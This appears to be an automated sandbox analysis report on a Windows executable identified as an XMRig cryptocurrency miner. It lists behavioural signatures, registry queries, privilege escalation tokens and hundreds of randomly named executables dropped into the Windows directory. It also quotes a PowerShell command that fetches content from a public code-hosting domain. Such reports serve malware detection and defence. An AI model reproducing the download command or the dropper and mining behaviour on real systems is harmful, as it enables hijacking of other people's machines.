Analysis Overview
SHA256
fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c
Threat Level: Known bad
The file fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
Suspicious use of NtCreateUserProcessOtherParentProcess
xmrig
Xmrig family
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Modifies Installed Components in the registry
Blocklisted process makes network request
UPX packed file
Executes dropped EXE
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Unsigned PE
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy service COM API
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Modifies registry class
Uses Volume Shadow Copy WMI provider
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 22:03
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xmrig family
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 22:03
Reported
2024-06-03 22:04
Platform
win10v2004-20240508-en
Max time kernel
61s
Max time network
64s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 13192 created 60 | N/A | C:\Windows\system32\WerFaultSecure.exe | C:\Windows\system32\svchost.exe |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Windows directory
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFaultSecure.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFaultSecure.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFaultSecure.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFaultSecure.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFaultSecure.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WerFaultSecure.exe | N/A |
| N/A | N/A | C:\Windows\system32\WerFaultSecure.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe
"C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
C:\Windows\System\axVNZQz.exe
C:\Windows\System\axVNZQz.exe
C:\Windows\System\aPjGTGe.exe
C:\Windows\System\aPjGTGe.exe
C:\Windows\System\EWdOxVy.exe
C:\Windows\System\EWdOxVy.exe
C:\Windows\System\brHqTLB.exe
C:\Windows\System\brHqTLB.exe
C:\Windows\System\IBMKRWO.exe
C:\Windows\System\IBMKRWO.exe
C:\Windows\System\sOalaow.exe
C:\Windows\System\sOalaow.exe
C:\Windows\System\qndCowM.exe
C:\Windows\System\qndCowM.exe
C:\Windows\System\PpisgNH.exe
C:\Windows\System\PpisgNH.exe
C:\Windows\System\urUyRME.exe
C:\Windows\System\urUyRME.exe
C:\Windows\System\nwWVnrF.exe
C:\Windows\System\nwWVnrF.exe
C:\Windows\System\OwTpFMC.exe
C:\Windows\System\OwTpFMC.exe
C:\Windows\System\SwCQmTw.exe
C:\Windows\System\SwCQmTw.exe
C:\Windows\System\bLpZMhH.exe
C:\Windows\System\bLpZMhH.exe
C:\Windows\System\pyyHgjv.exe
C:\Windows\System\pyyHgjv.exe
C:\Windows\System\Burqpzn.exe
C:\Windows\System\Burqpzn.exe
C:\Windows\System\XDZxNQE.exe
C:\Windows\System\XDZxNQE.exe
C:\Windows\System\OuNGpZq.exe
C:\Windows\System\OuNGpZq.exe
C:\Windows\System\ILGXdDw.exe
C:\Windows\System\ILGXdDw.exe
C:\Windows\System\TAOyIgC.exe
C:\Windows\System\TAOyIgC.exe
C:\Windows\System\RdtjIlK.exe
C:\Windows\System\RdtjIlK.exe
C:\Windows\System\qUtHKyC.exe
C:\Windows\System\qUtHKyC.exe
C:\Windows\System\ygtUIca.exe
C:\Windows\System\ygtUIca.exe
C:\Windows\System\JJjLlUH.exe
C:\Windows\System\JJjLlUH.exe
C:\Windows\System\ScQKdch.exe
C:\Windows\System\ScQKdch.exe
C:\Windows\System\trEJEmh.exe
C:\Windows\System\trEJEmh.exe
C:\Windows\System\nKADzeH.exe
C:\Windows\System\nKADzeH.exe
C:\Windows\System\ybHZLWM.exe
C:\Windows\System\ybHZLWM.exe
C:\Windows\System\AmtaodT.exe
C:\Windows\System\AmtaodT.exe
C:\Windows\System\RLvenfC.exe
C:\Windows\System\RLvenfC.exe
C:\Windows\System\whoZHnc.exe
C:\Windows\System\whoZHnc.exe
C:\Windows\System\zoOJLVN.exe
C:\Windows\System\zoOJLVN.exe
C:\Windows\System\SyqIKiE.exe
C:\Windows\System\SyqIKiE.exe
C:\Windows\System\JwmkKWr.exe
C:\Windows\System\JwmkKWr.exe
C:\Windows\System\uomMsCL.exe
C:\Windows\System\uomMsCL.exe
C:\Windows\System\qfsgPNK.exe
C:\Windows\System\qfsgPNK.exe
C:\Windows\System\ZLHJgrb.exe
C:\Windows\System\ZLHJgrb.exe
C:\Windows\System\UpmNNNc.exe
C:\Windows\System\UpmNNNc.exe
C:\Windows\System\jSHSNNo.exe
C:\Windows\System\jSHSNNo.exe
C:\Windows\System\KjzBcML.exe
C:\Windows\System\KjzBcML.exe
C:\Windows\System\bxLGsnI.exe
C:\Windows\System\bxLGsnI.exe
C:\Windows\System\HghtKZy.exe
C:\Windows\System\HghtKZy.exe
C:\Windows\System\HlheYaz.exe
C:\Windows\System\HlheYaz.exe
C:\Windows\System\DtakIIV.exe
C:\Windows\System\DtakIIV.exe
C:\Windows\System\KSLmDSj.exe
C:\Windows\System\KSLmDSj.exe
C:\Windows\System\UVEbZRA.exe
C:\Windows\System\UVEbZRA.exe
C:\Windows\System\EYBfZjX.exe
C:\Windows\System\EYBfZjX.exe
C:\Windows\System\eRDrLDn.exe
C:\Windows\System\eRDrLDn.exe
C:\Windows\System\Eokyjbl.exe
C:\Windows\System\Eokyjbl.exe
C:\Windows\System\mgRmMZb.exe
C:\Windows\System\mgRmMZb.exe
C:\Windows\System\nOqNTFJ.exe
C:\Windows\System\nOqNTFJ.exe
C:\Windows\System\glLEVTL.exe
C:\Windows\System\glLEVTL.exe
C:\Windows\System\CplFYAK.exe
C:\Windows\System\CplFYAK.exe
C:\Windows\System\uZyViSu.exe
C:\Windows\System\uZyViSu.exe
C:\Windows\System\zbFLVEz.exe
C:\Windows\System\zbFLVEz.exe
C:\Windows\System\uoPtpCa.exe
C:\Windows\System\uoPtpCa.exe
C:\Windows\System\seXQAAj.exe
C:\Windows\System\seXQAAj.exe
C:\Windows\System\IlhRTZJ.exe
C:\Windows\System\IlhRTZJ.exe
C:\Windows\System\mnIGCht.exe
C:\Windows\System\mnIGCht.exe
C:\Windows\System\PFwZwRy.exe
C:\Windows\System\PFwZwRy.exe
C:\Windows\System\buusUZo.exe
C:\Windows\System\buusUZo.exe
C:\Windows\System\ErfkTej.exe
C:\Windows\System\ErfkTej.exe
C:\Windows\System\TRdfIRQ.exe
C:\Windows\System\TRdfIRQ.exe
C:\Windows\System\BKhgDAT.exe
C:\Windows\System\BKhgDAT.exe
C:\Windows\System\zgMDbxO.exe
C:\Windows\System\zgMDbxO.exe
C:\Windows\System\ommsLKu.exe
C:\Windows\System\ommsLKu.exe
C:\Windows\System\AuNLKLZ.exe
C:\Windows\System\AuNLKLZ.exe
C:\Windows\System\gtSReBv.exe
C:\Windows\System\gtSReBv.exe
C:\Windows\System\EyySyoh.exe
C:\Windows\System\EyySyoh.exe
C:\Windows\System\gUWvuLK.exe
C:\Windows\System\gUWvuLK.exe
C:\Windows\System\eajXYrT.exe
C:\Windows\System\eajXYrT.exe
C:\Windows\System\TFborHa.exe
C:\Windows\System\TFborHa.exe
C:\Windows\System\uMCyArA.exe
C:\Windows\System\uMCyArA.exe
C:\Windows\System\aQfBRpG.exe
C:\Windows\System\aQfBRpG.exe
C:\Windows\System\NXIkbaK.exe
C:\Windows\System\NXIkbaK.exe
C:\Windows\System\RSVFSKj.exe
C:\Windows\System\RSVFSKj.exe
C:\Windows\System\SbzIlWd.exe
C:\Windows\System\SbzIlWd.exe
C:\Windows\System\ecSyMaF.exe
C:\Windows\System\ecSyMaF.exe
C:\Windows\System\UtMtgIZ.exe
C:\Windows\System\UtMtgIZ.exe
C:\Windows\System\xhIyEbV.exe
C:\Windows\System\xhIyEbV.exe
C:\Windows\System\rSVfnmb.exe
C:\Windows\System\rSVfnmb.exe
C:\Windows\System\RbzuliS.exe
C:\Windows\System\RbzuliS.exe
C:\Windows\System\wFdxZtN.exe
C:\Windows\System\wFdxZtN.exe
C:\Windows\System\MMGUVvb.exe
C:\Windows\System\MMGUVvb.exe
C:\Windows\System\xyOygCh.exe
C:\Windows\System\xyOygCh.exe
C:\Windows\System\kcrLFqD.exe
C:\Windows\System\kcrLFqD.exe
C:\Windows\System\iMzlkeC.exe
C:\Windows\System\iMzlkeC.exe
C:\Windows\System\ArvkLiO.exe
C:\Windows\System\ArvkLiO.exe
C:\Windows\System\ytOVIbZ.exe
C:\Windows\System\ytOVIbZ.exe
C:\Windows\System\ThEEWXB.exe
C:\Windows\System\ThEEWXB.exe
C:\Windows\System\lAXkGjG.exe
C:\Windows\System\lAXkGjG.exe
C:\Windows\System\hkKXvOL.exe
C:\Windows\System\hkKXvOL.exe
C:\Windows\System\nVYsmke.exe
C:\Windows\System\nVYsmke.exe
C:\Windows\System\aaCvphv.exe
C:\Windows\System\aaCvphv.exe
C:\Windows\System\KUEyxzr.exe
C:\Windows\System\KUEyxzr.exe
C:\Windows\System\BGYPcvR.exe
C:\Windows\System\BGYPcvR.exe
C:\Windows\System\fzVdRMQ.exe
C:\Windows\System\fzVdRMQ.exe
C:\Windows\System\wDzdBke.exe
C:\Windows\System\wDzdBke.exe
C:\Windows\System\daAsNnI.exe
C:\Windows\System\daAsNnI.exe
C:\Windows\System\MJcKTxA.exe
C:\Windows\System\MJcKTxA.exe
C:\Windows\System\nsNzJer.exe
C:\Windows\System\nsNzJer.exe
C:\Windows\System\NslDvfo.exe
C:\Windows\System\NslDvfo.exe
C:\Windows\System\CwkutbX.exe
C:\Windows\System\CwkutbX.exe
C:\Windows\System\qMDyPbX.exe
C:\Windows\System\qMDyPbX.exe
C:\Windows\System\oPMPPdf.exe
C:\Windows\System\oPMPPdf.exe
C:\Windows\System\ewmwWXv.exe
C:\Windows\System\ewmwWXv.exe
C:\Windows\System\iQsGVrP.exe
C:\Windows\System\iQsGVrP.exe
C:\Windows\System\XzGxJjE.exe
C:\Windows\System\XzGxJjE.exe
C:\Windows\System\NxSZemC.exe
C:\Windows\System\NxSZemC.exe
C:\Windows\System\FIFvYuY.exe
C:\Windows\System\FIFvYuY.exe
C:\Windows\System\xiohMMz.exe
C:\Windows\System\xiohMMz.exe
C:\Windows\System\rePdsqK.exe
C:\Windows\System\rePdsqK.exe
C:\Windows\System\ovGIlTb.exe
C:\Windows\System\ovGIlTb.exe
C:\Windows\System\XXrtiVb.exe
C:\Windows\System\XXrtiVb.exe
C:\Windows\System\kzaKLOg.exe
C:\Windows\System\kzaKLOg.exe
C:\Windows\System\GbXZZOZ.exe
C:\Windows\System\GbXZZOZ.exe
C:\Windows\System\bwGemzi.exe
C:\Windows\System\bwGemzi.exe
C:\Windows\System\rqFyKMG.exe
C:\Windows\System\rqFyKMG.exe
C:\Windows\System\cFXBTYz.exe
C:\Windows\System\cFXBTYz.exe
C:\Windows\System\geAhvdI.exe
C:\Windows\System\geAhvdI.exe
C:\Windows\System\GCNxGTE.exe
C:\Windows\System\GCNxGTE.exe
C:\Windows\System\prezFSo.exe
C:\Windows\System\prezFSo.exe
C:\Windows\System\TCKITrY.exe
C:\Windows\System\TCKITrY.exe
C:\Windows\System\pyyhtvx.exe
C:\Windows\System\pyyhtvx.exe
C:\Windows\System\UtCPioV.exe
C:\Windows\System\UtCPioV.exe
C:\Windows\System\zgyMzjd.exe
C:\Windows\System\zgyMzjd.exe
C:\Windows\System\AgtMWSS.exe
C:\Windows\System\AgtMWSS.exe
C:\Windows\System\gOKMywz.exe
C:\Windows\System\gOKMywz.exe
C:\Windows\System\Aqmpvhx.exe
C:\Windows\System\Aqmpvhx.exe
C:\Windows\System\oXvXJKS.exe
C:\Windows\System\oXvXJKS.exe
C:\Windows\System\grUqtrL.exe
C:\Windows\System\grUqtrL.exe
C:\Windows\System\IyvbttH.exe
C:\Windows\System\IyvbttH.exe
C:\Windows\System\bRPpaBq.exe
C:\Windows\System\bRPpaBq.exe
C:\Windows\System\xoUxVLh.exe
C:\Windows\System\xoUxVLh.exe
C:\Windows\System\DVQOvMD.exe
C:\Windows\System\DVQOvMD.exe
C:\Windows\System\VJkVCDM.exe
C:\Windows\System\VJkVCDM.exe
C:\Windows\System\tcUVORN.exe
C:\Windows\System\tcUVORN.exe
C:\Windows\System\TZZBYYV.exe
C:\Windows\System\TZZBYYV.exe
C:\Windows\System\wfKxxkq.exe
C:\Windows\System\wfKxxkq.exe
C:\Windows\System\AZPQtLy.exe
C:\Windows\System\AZPQtLy.exe
C:\Windows\System\clPnfKK.exe
C:\Windows\System\clPnfKK.exe
C:\Windows\System\EtQVBCr.exe
C:\Windows\System\EtQVBCr.exe
C:\Windows\System\MqsPXrL.exe
C:\Windows\System\MqsPXrL.exe
C:\Windows\System\rnomGct.exe
C:\Windows\System\rnomGct.exe
C:\Windows\System\inpyqIp.exe
C:\Windows\System\inpyqIp.exe
C:\Windows\System\jopjFvT.exe
C:\Windows\System\jopjFvT.exe
C:\Windows\System\WkxZzRN.exe
C:\Windows\System\WkxZzRN.exe
C:\Windows\System\oRqXRKS.exe
C:\Windows\System\oRqXRKS.exe
C:\Windows\System\gPuOPYN.exe
C:\Windows\System\gPuOPYN.exe
C:\Windows\System\RGtVlOb.exe
C:\Windows\System\RGtVlOb.exe
C:\Windows\System\YekRVxL.exe
C:\Windows\System\YekRVxL.exe
C:\Windows\System\dwWYgpe.exe
C:\Windows\System\dwWYgpe.exe
C:\Windows\System\PgIlVer.exe
C:\Windows\System\PgIlVer.exe
C:\Windows\System\zirjchu.exe
C:\Windows\System\zirjchu.exe
C:\Windows\System\ubsHomx.exe
C:\Windows\System\ubsHomx.exe
C:\Windows\System\TnuzhVw.exe
C:\Windows\System\TnuzhVw.exe
C:\Windows\System\zkWzoTN.exe
C:\Windows\System\zkWzoTN.exe
C:\Windows\System\OKtDFbV.exe
C:\Windows\System\OKtDFbV.exe
C:\Windows\System\BOmbTxL.exe
C:\Windows\System\BOmbTxL.exe
C:\Windows\System\ocRVxfK.exe
C:\Windows\System\ocRVxfK.exe
C:\Windows\System\Mhusulm.exe
C:\Windows\System\Mhusulm.exe
C:\Windows\System\VZPyVKx.exe
C:\Windows\System\VZPyVKx.exe
C:\Windows\System\gyErbaz.exe
C:\Windows\System\gyErbaz.exe
C:\Windows\System\eAmeZAa.exe
C:\Windows\System\eAmeZAa.exe
C:\Windows\System\LkpsDyY.exe
C:\Windows\System\LkpsDyY.exe
C:\Windows\System\ZRCePpC.exe
C:\Windows\System\ZRCePpC.exe
C:\Windows\System\vEoitWT.exe
C:\Windows\System\vEoitWT.exe
C:\Windows\System\AYprNoP.exe
C:\Windows\System\AYprNoP.exe
C:\Windows\System\QhZiYPp.exe
C:\Windows\System\QhZiYPp.exe
C:\Windows\System\SgBkJOM.exe
C:\Windows\System\SgBkJOM.exe
C:\Windows\System\wwxdwmG.exe
C:\Windows\System\wwxdwmG.exe
C:\Windows\System\KLiVFub.exe
C:\Windows\System\KLiVFub.exe
C:\Windows\System\imfpwix.exe
C:\Windows\System\imfpwix.exe
C:\Windows\System\FYrqkGW.exe
C:\Windows\System\FYrqkGW.exe
C:\Windows\System\RHqjTjw.exe
C:\Windows\System\RHqjTjw.exe
C:\Windows\System\qKvjIWK.exe
C:\Windows\System\qKvjIWK.exe
C:\Windows\System\LRYoKFU.exe
C:\Windows\System\LRYoKFU.exe
C:\Windows\System\NZswjtY.exe
C:\Windows\System\NZswjtY.exe
C:\Windows\System\YFGVMSR.exe
C:\Windows\System\YFGVMSR.exe
C:\Windows\System\UWfjsoa.exe
C:\Windows\System\UWfjsoa.exe
C:\Windows\System\LulYPcq.exe
C:\Windows\System\LulYPcq.exe
C:\Windows\System\sMqtzdl.exe
C:\Windows\System\sMqtzdl.exe
C:\Windows\System\OZzoRJE.exe
C:\Windows\System\OZzoRJE.exe
C:\Windows\System\wzZVEVC.exe
C:\Windows\System\wzZVEVC.exe
C:\Windows\System\EXjBJFz.exe
C:\Windows\System\EXjBJFz.exe
C:\Windows\System\gPvOrkv.exe
C:\Windows\System\gPvOrkv.exe
C:\Windows\System\lhgIdhN.exe
C:\Windows\System\lhgIdhN.exe
C:\Windows\System\rZwKkfe.exe
C:\Windows\System\rZwKkfe.exe
C:\Windows\System\vjdVfUH.exe
C:\Windows\System\vjdVfUH.exe
C:\Windows\System\NfdviEF.exe
C:\Windows\System\NfdviEF.exe
C:\Windows\System\lqhVoso.exe
C:\Windows\System\lqhVoso.exe
C:\Windows\System\BVrEoGw.exe
C:\Windows\System\BVrEoGw.exe
C:\Windows\System\gcEpZry.exe
C:\Windows\System\gcEpZry.exe
C:\Windows\System\SPiOSPS.exe
C:\Windows\System\SPiOSPS.exe
C:\Windows\System\JNbnzag.exe
C:\Windows\System\JNbnzag.exe
C:\Windows\System\krpauzh.exe
C:\Windows\System\krpauzh.exe
C:\Windows\System\ILXFEcv.exe
C:\Windows\System\ILXFEcv.exe
C:\Windows\System\UCuKxxr.exe
C:\Windows\System\UCuKxxr.exe
C:\Windows\System\UHbkhej.exe
C:\Windows\System\UHbkhej.exe
C:\Windows\System\OlcuNJy.exe
C:\Windows\System\OlcuNJy.exe
C:\Windows\System\TeJfaqE.exe
C:\Windows\System\TeJfaqE.exe
C:\Windows\System\msNlPXw.exe
C:\Windows\System\msNlPXw.exe
C:\Windows\System\ukFZlFo.exe
C:\Windows\System\ukFZlFo.exe
C:\Windows\System\bdRJNsH.exe
C:\Windows\System\bdRJNsH.exe
C:\Windows\System\cyWPFrM.exe
C:\Windows\System\cyWPFrM.exe
C:\Windows\System\yMPuAeK.exe
C:\Windows\System\yMPuAeK.exe
C:\Windows\System\nrYBxqt.exe
C:\Windows\System\nrYBxqt.exe
C:\Windows\System\vhTqtCx.exe
C:\Windows\System\vhTqtCx.exe
C:\Windows\System\KkFPXkF.exe
C:\Windows\System\KkFPXkF.exe
C:\Windows\System\CbUlczs.exe
C:\Windows\System\CbUlczs.exe
C:\Windows\System\NkJuDxf.exe
C:\Windows\System\NkJuDxf.exe
C:\Windows\System\jTHVCTZ.exe
C:\Windows\System\jTHVCTZ.exe
C:\Windows\System\MmFlZrB.exe
C:\Windows\System\MmFlZrB.exe
C:\Windows\System\xEYRfJB.exe
C:\Windows\System\xEYRfJB.exe
C:\Windows\System\fEoillA.exe
C:\Windows\System\fEoillA.exe
C:\Windows\System\QtwgeSj.exe
C:\Windows\System\QtwgeSj.exe
C:\Windows\System\LDDMagT.exe
C:\Windows\System\LDDMagT.exe
C:\Windows\System\AGhOOgQ.exe
C:\Windows\System\AGhOOgQ.exe
C:\Windows\System\TUYwCRd.exe
C:\Windows\System\TUYwCRd.exe
C:\Windows\System\BmXFNDN.exe
C:\Windows\System\BmXFNDN.exe
C:\Windows\System\xmCWtrt.exe
C:\Windows\System\xmCWtrt.exe
C:\Windows\System\KrcBCLn.exe
C:\Windows\System\KrcBCLn.exe
C:\Windows\System\BsecAAE.exe
C:\Windows\System\BsecAAE.exe
C:\Windows\System\BRoExnP.exe
C:\Windows\System\BRoExnP.exe
C:\Windows\System\cQatYdr.exe
C:\Windows\System\cQatYdr.exe
C:\Windows\System\zLhfEZy.exe
C:\Windows\System\zLhfEZy.exe
C:\Windows\System\GmvzQFZ.exe
C:\Windows\System\GmvzQFZ.exe
C:\Windows\System\PkwpUuF.exe
C:\Windows\System\PkwpUuF.exe
C:\Windows\System\sIBqHLh.exe
C:\Windows\System\sIBqHLh.exe
C:\Windows\System\ALecoVY.exe
C:\Windows\System\ALecoVY.exe
C:\Windows\System\aoirxmg.exe
C:\Windows\System\aoirxmg.exe
C:\Windows\System\bLmNMOo.exe
C:\Windows\System\bLmNMOo.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4440,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:8
C:\Windows\System\gdUTbPd.exe
C:\Windows\System\gdUTbPd.exe
C:\Windows\System\YTmAbfJ.exe
C:\Windows\System\YTmAbfJ.exe
C:\Windows\System\aGKxsVA.exe
C:\Windows\System\aGKxsVA.exe
C:\Windows\System\gPjjFEL.exe
C:\Windows\System\gPjjFEL.exe
C:\Windows\System\gTnBiMt.exe
C:\Windows\System\gTnBiMt.exe
C:\Windows\System\RluSSxf.exe
C:\Windows\System\RluSSxf.exe
C:\Windows\System\mLGRxAR.exe
C:\Windows\System\mLGRxAR.exe
C:\Windows\System\PYhJcKy.exe
C:\Windows\System\PYhJcKy.exe
C:\Windows\System\mvrvTvL.exe
C:\Windows\System\mvrvTvL.exe
C:\Windows\System\FmjgszC.exe
C:\Windows\System\FmjgszC.exe
C:\Windows\System\EEHSipw.exe
C:\Windows\System\EEHSipw.exe
C:\Windows\System\BPRwXZi.exe
C:\Windows\System\BPRwXZi.exe
C:\Windows\System\TzrSfha.exe
C:\Windows\System\TzrSfha.exe
C:\Windows\System\NzfOtBr.exe
